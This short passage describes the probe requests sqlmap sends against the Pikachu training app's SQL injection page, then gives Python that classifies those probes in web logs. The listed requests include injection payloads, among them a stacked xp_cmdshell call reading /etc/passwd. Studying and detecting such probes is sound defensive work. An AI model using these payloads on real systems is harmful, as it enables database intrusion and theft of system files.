When sqlmap performs its initial detection, it first sends a series of preliminary check requests:

GET /pikachu/vul/sqli/sqli_str.php?name=root&submit=查询&teEu=1187 AND 1=1 UNION ALL SELECT 1,NULL,'',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat …/…/…/etc/passwd')# HTTP/1.1 # determines the database type and tests an XSS statement
GET /pikachu/vul/sqli/sqli_str.php?name=root&submit=查询 HTTP/1.1
GET /pikachu/vul/sqli/sqli_str.php?name=4767&submit=查询 HTTP/1.1
GET /pikachu/vul/sqli/sqli_str.php?name=root(,.,.)."'&submit=查询 HTTP/1.1
GET /pikachu/vul/sqli/sqli_str.php?name=root'fYzJCd<'">QtldwA&submit=查询 HTTP/1.1
GET /pikachu/vul/sqli/sqli_str.php?name=root') AND 4676=7206 AND ('OEeA'='OEeA&submit=查询 HTTP/1.1
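For log review, the requests listed above can be turned into a small classifier. The following Python is an added example, not code from the original page or from sqlmap; the probe labels, the regular expressions and the three-kinds threshold are assumptions derived only from those six requests, written here with ASCII quotes.

```python
import re
from urllib.parse import unquote_plus

# Labels and patterns are assumptions derived from the requests listed above.
PROBES = [
    ("stacked_union_probe", re.compile(
        r"UNION ALL SELECT .*information_schema\.tables.*xp_cmdshell", re.I | re.S)),
    ("reflection_marker_probe", re.compile(r"'[A-Za-z]+<'\">[A-Za-z]+$")),
    ("quote_punctuation_probe", re.compile(r"[(),.'\"]{6,}$")),
    ("boolean_comparison_probe", re.compile(r"\bAND \d+=\d+\b")),
]

def classify(request_line):
    """Return the first probe label matched by a 'GET <target> HTTP/1.1' line, or None."""
    target = request_line.split(" ", 1)[1].rsplit(" ", 1)[0]
    query = target.partition("?")[2].split("#", 1)[0]
    for pair in query.split("&"):
        value = unquote_plus(pair.partition("=")[2])
        for label, pattern in PROBES:
            if pattern.search(value):
                return label
    return None

def precheck_burst(request_lines, min_kinds=3):
    """Map each path to its probe kinds when at least min_kinds distinct kinds hit it."""
    kinds = {}
    for line in request_lines:
        label = classify(line)
        if label:
            path = line.split(" ", 2)[1].partition("?")[0]
            kinds.setdefault(path, set()).add(label)
    return {p: sorted(k) for p, k in kinds.items() if len(k) >= min_kinds}

# Sample input: the six requests from the text above, quotes written as ASCII.
SAMPLE = """GET /pikachu/vul/sqli/sqli_str.php?name=root&submit=查询&teEu=1187 AND 1=1 UNION ALL SELECT 1,NULL,'',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat …/…/…/etc/passwd')# HTTP/1.1
GET /pikachu/vul/sqli/sqli_str.php?name=root&submit=查询 HTTP/1.1
GET /pikachu/vul/sqli/sqli_str.php?name=4767&submit=查询 HTTP/1.1
GET /pikachu/vul/sqli/sqli_str.php?name=root(,.,.)."'&submit=查询 HTTP/1.1
GET /pikachu/vul/sqli/sqli_str.php?name=root'fYzJCd<'">QtldwA&submit=查询 HTTP/1.1
GET /pikachu/vul/sqli/sqli_str.php?name=root') AND 4676=7206 AND ('OEeA'='OEeA&submit=查询 HTTP/1.1
""".splitlines()

if __name__ == "__main__":
    for line in SAMPLE:
        print(classify(line), "<-", line[:70])
    print(precheck_burst(SAMPLE))
```

The two unlabelled requests (the original value and the value replaced by `4767`) carry no payload, so they can only be tied to the scan through the surrounding burst on the same path.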